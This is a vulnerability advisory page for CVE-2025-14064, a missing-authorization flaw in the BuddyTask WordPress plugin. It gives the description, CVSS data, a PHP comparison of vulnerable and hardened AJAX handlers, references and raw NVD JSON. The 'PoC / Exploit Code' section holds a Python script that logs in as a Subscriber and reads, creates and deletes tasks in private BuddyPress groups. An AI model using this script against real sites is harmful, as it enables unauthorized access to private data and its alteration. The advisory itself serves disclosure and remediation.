Security Vulnerability Report
CVE-2025-14064 CVSS 5.4 MEDIUM

CVE-2025-14064

Published: 2025-12-12 04:15:47
Last Modified: 2026-04-15 00:35:42

Description

The BuddyTask plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on multiple AJAX endpoints in all versions up to, and including, 1.3.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view, create, modify, and delete task boards belonging to any BuddyPress group, including private and hidden groups they are not members of.
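The root cause is CWE-862 (missing authorization): the AJAX handlers act on whatever group_id the request names without asking BuddyPress whether the caller may see or change that group. The PHP below is added here as an illustration and is not BuddyTask's own code; it shows the vulnerable handler shape next to a hardened one. The action name, nonce action, parameter names and the example_save_task_board() helper are assumed placeholders, while check_ajax_referer(), groups_get_group(), groups_is_user_member() and bp_current_user_can() are the real WordPress/BuddyPress APIs a fix would use.

```php
<?php
/**
 * Added illustration for CVE-2025-14064 (CWE-862), not BuddyTask's own code.
 * Action names, parameter names and example_save_task_board() are hypothetical;
 * the authorization logic uses real WordPress / BuddyPress functions.
 */

// VULNERABLE pattern: trusts group_id from the request and never asks
// BuddyPress whether the caller may act on that group's board.
function example_vulnerable_save_board() {
    $group_id = absint( $_POST['group_id'] ?? 0 );
    $title    = sanitize_text_field( wp_unslash( $_POST['title'] ?? '' ) );
    // Any logged-in user (Subscriber and up) reaches this line for any group,
    // including private and hidden groups they are not a member of.
    example_save_task_board( $group_id, $title );
    wp_send_json_success();
}

/**
 * Authorization helper: true only when the current user may act on $group_id.
 */
function example_user_can_access_group_board( $group_id ) {
    $user_id = get_current_user_id();
    if ( ! $user_id || ! $group_id ) {
        return false;
    }
    $group = groups_get_group( $group_id );
    if ( empty( $group->id ) ) {
        return false; // unknown group: fail closed, do not reveal existence
    }
    // Site-wide community moderators keep access everywhere.
    if ( bp_current_user_can( 'bp_moderate' ) ) {
        return true;
    }
    // Everyone else must actually be a member of this specific group.
    return (bool) groups_is_user_member( $user_id, $group_id );
}

// HARDENED pattern: nonce (CSRF) check, then an explicit authorization check
// bound to the object the request names, before any data is touched.
function example_hardened_save_board() {
    check_ajax_referer( 'example_buddytask_board', 'nonce' ); // dies with -1/403 on failure
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( array( 'message' => 'Authentication required.' ), 401 );
    }
    $group_id = absint( $_POST['group_id'] ?? 0 );
    if ( ! example_user_can_access_group_board( $group_id ) ) {
        // Same response for "no such group" and "not a member", so hidden
        // groups cannot be enumerated by iterating group_id.
        wp_send_json_error( array( 'message' => 'Not allowed.' ), 403 );
    }
    $title = sanitize_text_field( wp_unslash( $_POST['title'] ?? '' ) );
    example_save_task_board( $group_id, $title );
    wp_send_json_success();
}

// Hypothetical persistence helper standing in for the plugin's own storage.
function example_save_task_board( $group_id, $title ) {
    update_option( 'example_board_' . $group_id, $title );
}

// Only the logged-in hook is registered (no wp_ajax_nopriv_ variant), so
// anonymous requests never reach the handler at all.
add_action( 'wp_ajax_example_buddytask_save_board', 'example_hardened_save_board' );
```

Membership is the floor, not the ceiling: if the plugin's own model restricts board edits or deletions to group admins or moderators, the create/modify/delete handlers should additionally check groups_is_user_admin() or groups_is_user_mod(). Note also that a nonce alone would not have prevented this bug: check_ajax_referer() stops cross-site request forgery, but a Subscriber can always obtain a valid nonce from a page they are allowed to view, so the group-membership check is the part that actually closes CWE-862.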

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is available from NVD for this entry.

BuddyTask plugin < 1.3.1 (all versions 1.3.0 and below are affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys

import requests

# CVE-2025-14064 PoC - BuddyTask Plugin Authorization Bypass
# Target: WordPress site with BuddyTask plugin <= 1.3.0
# The AJAX action and parameter names below are placeholders; take the real
# ones from the plugin's add_action('wp_ajax_...') registrations in buddytask.php.
target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress.local'
wp_admin_ajax = f'{target_url}/wp-admin/admin-ajax.php'

# Authenticate as Subscriber (lowest privilege level)
session = requests.Session()
login_data = {
    'log': 'attacker_username',
    'pwd': 'attacker_password',
    'wp-submit': 'Log In',
    'redirect_to': '/wp-admin/',
    'testcookie': '1',
}

# Login to WordPress. wp-login.php rejects a POST carrying testcookie=1 unless
# the wordpress_test_cookie cookie is also present, so set it first.
session.cookies.set('wordpress_test_cookie', 'WP Cookie check')
session.post(f'{target_url}/wp-login.php', data=login_data)
if not any(c.name.startswith('wordpress_logged_in_') for c in session.cookies):
    sys.exit('[-] Login failed: no wordpress_logged_in_* cookie received')

# Exploit: access a private/hidden group's task board without membership
# Step 1: List tasks from a private group (group_id=999)
exploit_data_list = {
    'action': 'buddytask_get_tasks',  # AJAX action name (placeholder)
    'group_id': '999',  # Target private/hidden group
    'nonce': 'attacker_can_obtain_from_source',  # Some endpoints may lack nonce
}
print('[+] Sending task list request to private group...')
response = session.post(wp_admin_ajax, data=exploit_data_list)
print(f'Status: {response.status_code}')
print(f'Response: {response.text[:500]}')

# Step 2: Create an unauthorized task
exploit_data_create = {
    'action': 'buddytask_create_task',
    'group_id': '999',
    'task_title': 'Malicious Task',
    'task_content': 'Compromised via CVE-2025-14064',
}
print('\n[+] Creating unauthorized task...')
response = session.post(wp_admin_ajax, data=exploit_data_create)
print(f'Status: {response.status_code}')

# Step 3: Delete a task from the group
exploit_data_delete = {
    'action': 'buddytask_delete_task',
    'task_id': '1',  # Target task ID
    'group_id': '999',
}
print('\n[+] Deleting tasks from unauthorized group...')
response = session.post(wp_admin_ajax, data=exploit_data_delete)
print(f'Status: {response.status_code}')

# admin-ajax.php answers "0" with HTTP 400 for an unregistered action and "-1"
# with HTTP 403 for a failed nonce check; only a normal response body on 200
# means the handler actually ran.
print('\n[!] If the above requests succeeded without a 403/permission error, the target is vulnerable.')
```

References

https://cwe.mitre.org/data/definitions/862.html
https://plugins.trac.wordpress.org/browser/buddytask/tags/1.3.0/buddytask.php#L458
https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L458
https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L666
https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L763
https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L840
https://plugins.trac.wordpress.org/changeset/3416754/
https://www.wordfence.com/threat-intel/vulnerabilities/id/0dfe0947-5790-49ba-aa3d-6bc61c12b355?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-14064",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-12T04:15:47.053",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The BuddyTask plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on multiple AJAX endpoints in all versions up to, and including, 1.3.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view, create, modify, and delete task boards belonging to any BuddyPress group, including private and hidden groups they are not members of."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-862"}
        ]
      }
    ],
    "references": [
      {"url": "https://cwe.mitre.org/data/definitions/862.html", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/buddytask/tags/1.3.0/buddytask.php#L458", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L458", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L666", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L763", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L840", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset/3416754/", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0dfe0947-5790-49ba-aa3d-6bc61c12b355?source=cve", "source": "[email protected]"}
    ]
  }
}
```